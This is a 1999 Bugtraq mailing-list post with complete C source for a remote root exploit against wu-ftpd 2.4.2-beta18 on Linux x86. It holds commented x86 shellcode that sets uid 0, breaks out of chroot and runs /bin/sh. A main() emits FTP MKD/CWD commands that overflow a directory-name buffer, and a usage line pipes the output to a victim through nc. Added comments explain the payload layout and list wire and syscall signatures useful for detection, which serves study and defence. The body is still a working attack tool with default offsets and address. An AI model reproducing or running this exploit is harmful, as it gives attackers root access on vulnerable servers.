another ftp exploit
daemon@ATHENA.MIT.EDU (Pieter Nieuwenhuijsen)
Fri Mar 26 01:56:28 1999
Date: Thu, 25 Mar 1999 15:42:47 +0100
Reply-To: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
To: BUGTRAQ@NETSPACE.ORG
/*
wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 )
by joey__ <youcan_reachme@hotmail.com> of rhino9 <http://www.rhino9.com> - 2/20/99
big thx horizon, duke, nimrood and icee
sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha
USAGE:
( ./wh0a [ initialdir ] [ <username> <password> ] [ <offset> <code address> ] ; cat ) | nc <victimname> <victimport>
*/
#include <stdio.h>
/*
 * Payload bytes that main() places at the start of the final MKD argument.
 * The per-instruction comments are the original author's; taken together
 * the visible bytes are: a decoder loop over the data area, setuid/setgid,
 * the open/mkdir/chroot/fchdir/chdir-loop/chroot sequence the author
 * describes as a chroot break, execve, exit, NOP padding, and 12 bytes of
 * scratch space.
 *
 * Layout facts a reader needs:
 *  - the initializer is exactly 156 bytes, so the array stores NO
 *    terminating NUL; main copies it with sizeof, never strlen.
 *  - offset 144 ("var0"/"cmd0"/"cmd1") is run-time scratch, written at
 *    [esi], [esi+4], [esi+8]; offset 156 (= sizeof) is where main appends
 *    the encoded x86_shellcode1, which the code addresses as [esi+0x0c].
 *
 * Defensive view: on the host this is an ftp daemon process performing
 * mkdir + chroot + repeated chdir("..") + chroot(".") and then executing
 * /bin/sh as uid 0 -- a syscall pattern with no legitimate counterpart in
 * normal ftpd operation and a reasonable basis for host-level alerting.
 */
char x86_shellcode0[156] =
"\x83\xec\x04" /* sub esp,4 */
/* esi -> local variables and data */
"\x5e" /* pop esi */
"\x83\xc6\x70" /* add esi,0x70 */
"\x83\xc6\x20" /* add esi,0x20 */
"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
/* decode the strings: 0x30 (48) bytes starting at [esi+0x0c] each get
   0x32 subtracted. main() adds 0x32 to the 32 bytes of x86_shellcode1 it
   appends (presumably so the embedded NUL separators survive the
   printf("%s") that emits the buffer); the remaining 16 bytes covered by
   the loop are 'x' filler that nothing visible reads afterwards. */
"\x31\xc9" /* xor ecx, ecx */
"\xb1\x30" /* mov cl,0x30 */
"\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */
"\x43" /* inc ebx */
"\x49" /* dec ecx */
"\x75\xf9" /* jnz short decode_next_byte */
"\x31\xc0" /* xor eax,eax */
/* setuid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x17" /* mov al,0x17 */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* setgid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x2e" /* mov al,0x2e */
"\xcd\x80" /* int 0x80 */
/* To break chroot we have to...
fd = open ( ".", O_RDONLY );
mkdir ( "hax0r", 0666 );
chroot ( "hax0r" );
fchdir ( fd );
for ( i = 0; i < 254; i++ )
chdir ( ".." );
chroot ( "." );
*/
"\x31\xc0" /* xor eax,eax */
/* var0 = open ( ".", O_RDONLY ) -- result stored at [esi] (scratch slot 0) */
"\x31\xc9" /* xor ecx,ecx */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x05" /* mov al,0x05 */
"\xcd\x80" /* int 0x80 */
"\x89\x06" /* mov [esi],eax */
"\x31\xc0" /* xor eax,eax */
/* mkdir ( "hax0r", 0666 ) -- mode read from [esi+0x1f], the 4 bytes at
   the end of x86_shellcode1 */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */
"\xb0\x27" /* mov al,0x27 */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* chroot ( "hax0r" ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* fchdir ( fd ) */
"\x8b\x1e" /* mov ebx,[esi] */
"\xb0\x85" /* mov al,0x85 */
"\xcd\x80" /* int 0x80 */
"\x31\xc9" /* xor ecx, ecx */
/* for ( i = 0; i < 254; i++ ) { */
"\xb1\xfe" /* mov cl,0xfe */
"\x31\xc0" /* xor eax,eax */
/* chdir ( ".." ) */
"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
"\xb0\x0c" /* mov al,0x0c */
"\xcd\x80" /* int 0x80 */
"\x49" /* dec ecx */
/* } */
"\x75\xf4" /* jnz short goto_parent_dir */
"\x31\xc0" /* xor eax,eax */
/* chroot ( "." ) */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */
"\x31\xc0" /* xor eax,eax */
/* execve ( "/bin/sh", "xxxxx", NULL ) -- argv[0] pointer written to
   [esi+4], NULL terminator to [esi+8] (scratch slots 1 and 2) */
"\x8d\x5e\x17" /* lea ebx,[esi+0x17] */
"\x8d\x4e\x04" /* lea ecx,[esi+0x04] */
"\x8d\x56\x08" /* lea edx,[esi+0x08] */
"\x89\x19" /* mov [ecx],ebx */
"\x89\x02" /* mov [edx],eax */
"\xb0\x0b" /* mov al, 0x0b */
"\xcd\x80" /* int 0x80 */
"\x31\xdb" /* xor ebx,ebx */
/* exit ( 0 ) */
"\x89\xd8" /* mov eax,ebx */
"\x40" /* inc eax */
"\xcd\x80" /* int 0x80 */
/* 11 NOP bytes of padding: code ends at offset 133, scratch begins at 144 */
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
/* 12 bytes of scratch, overwritten at run time (offsets 144..155) */
"var0"
/* local variable integer */
"cmd0"
/* char *cmd[2] */
"cmd1";
/*
 * Data area that main() appends, byte-by-byte + 0x32, directly behind
 * x86_shellcode0 (offset 156 of the final buffer). Relative to esi in the
 * code above, which addresses this region as [esi+0x0c], the fields are:
 *   +0x0c  ".."       +0x0f  "."       +0x11  "hax0r"
 *   +0x17  "/bin/sh"  +0x1f  0x000001b6 (= 0666 octal, the mkdir mode)
 * The initializer is 23 bytes; main copies 32, so bytes 23..31 are the
 * array's zero fill. The 1024-byte size is far larger than anything used.
 */
char x86_shellcode1[1024] =
".."
"\x00"
"."
"\x00"
"hax0r"
"\x00"
"/bin/sh"
"\x00"
"\xb6\x01\x00\x00";
/* Scratch buffer for each directory name main() prints. The largest
   fixed-size write is 250 + 4 bytes plus a terminator at vardir[254],
   but the length of the FIRST name is derived from argv[4] and
   strlen(argv[1]) with no bounds check against the 300 bytes here. */
char vardir[300];
/* Length of the name currently being built in vardir. */
int varlen;
/*
 * Entry point. Writes an FTP command sequence to stdout (the USAGE line
 * in the header pipes it into nc): "user"/"pass"/"cwd" lines, then four
 * MKD/CWD pairs whose arguments are long runs of 'x', and finally one MKD
 * whose argument is x86_shellcode0 + the encoded x86_shellcode1 + the
 * 4-byte code address.
 *
 * argv[1]     initial directory (default "/incoming")
 * argv[2..3]  username / password, only echoed (defaults below)
 * argv[4..5]  buffer offset / code address via atoi (defaults 195 and
 *             0x0805ac81)
 *
 * Review notes on this listing as given:
 *  - strlen() and atoi() are used with only <stdio.h> included, i.e. as
 *    implicitly declared functions; <string.h> and <stdlib.h> are absent.
 *    Implicit declarations are invalid since C99.
 *  - main has no return type and no return statement (pre-C99 style).
 *  - bufoffset - strlen(initialdir) is used as a write length into the
 *    300-byte global vardir without a range check; a large argv[4] or a
 *    long argv[1] makes it negative or larger than the buffer.
 *  - codeaddr is stored through (int *)&vardir[varlen]: an unaligned
 *    store through an incompatible pointer type, undefined behavior in
 *    strict C even though x86 tolerates it.
 *
 * Defensive view: the on-the-wire signature is repeated MKD/CWD commands
 * with 170-250 byte single-character directory names followed by an MKD
 * argument containing non-printable bytes. Where ftpd command logging is
 * enabled, or in network IDS rules, that pattern is what identifies this
 * family of attack.
 */
main ( int argc, char **argv )
{
char *username, *password, *initialdir;
int bufoffset, codeaddr, i, j, *pcodeaddr;
/* argv[1]: directory to CWD into first */
if ( argc > 1 )
initialdir = argv[1];
else initialdir = "/incoming";
/* argv[2], argv[3]: credentials; only echoed, never validated here */
if ( argc > 3 )
{
username = argv[2];
password = argv[3];
}
else
{
username = "anonymous";
password = "poon@ni.com";
}
/* argv[4], argv[5]: atoi() reports no errors, so non-numeric input
   silently becomes 0 */
if ( argc > 5 )
{
bufoffset = atoi ( argv[4] );
codeaddr = atoi ( argv[5] );
}
else
{
bufoffset = 195;
codeaddr = 0x0805ac81;
}
printf ( "user %s\n", username );
printf ( "pass %s\n", password );
printf ( "cwd %s\n", initialdir );
/* first name: sized so that strlen(initialdir) + varlen == bufoffset.
   No check that the result lies in 0..299 -- see review notes above. */
varlen = bufoffset - strlen ( initialdir );
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
/* three further fixed-length names (210, 210 and 170 bytes of 'x'),
   each created and then entered */
varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
varlen = 170;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );
/* final name, 254 bytes plus terminator, laid out as:
   [0..155]    x86_shellcode0 (copied with sizeof: it has no NUL terminator)
   [156..187]  x86_shellcode1, each byte + 0x32 (undone by the decoder loop
               at the start of x86_shellcode0)
   [188..249]  'x' filler
   [250..253]  codeaddr in host byte order (little-endian on the x86
               target named in the header)
   [254]       NUL */
varlen = 250;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ )
vardir[i] = x86_shellcode0[i];
j = 0;
/* x86_shellcode1's initializer is only 23 bytes; bytes 23..31 come from
   the array's zero fill and therefore encode to 0x32 */
for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ )
{
vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 );
}
/* unaligned int store into a char array -- see review notes above */
pcodeaddr = ( int * ) &( vardir[varlen] );
*pcodeaddr = codeaddr;
vardir[varlen+4] = 0;
/* printf("%s") stops at the first zero byte, so the whole 254-byte name
   is emitted only if neither the payload nor codeaddr contains one */
printf ( "mkd %s\n", vardir );
}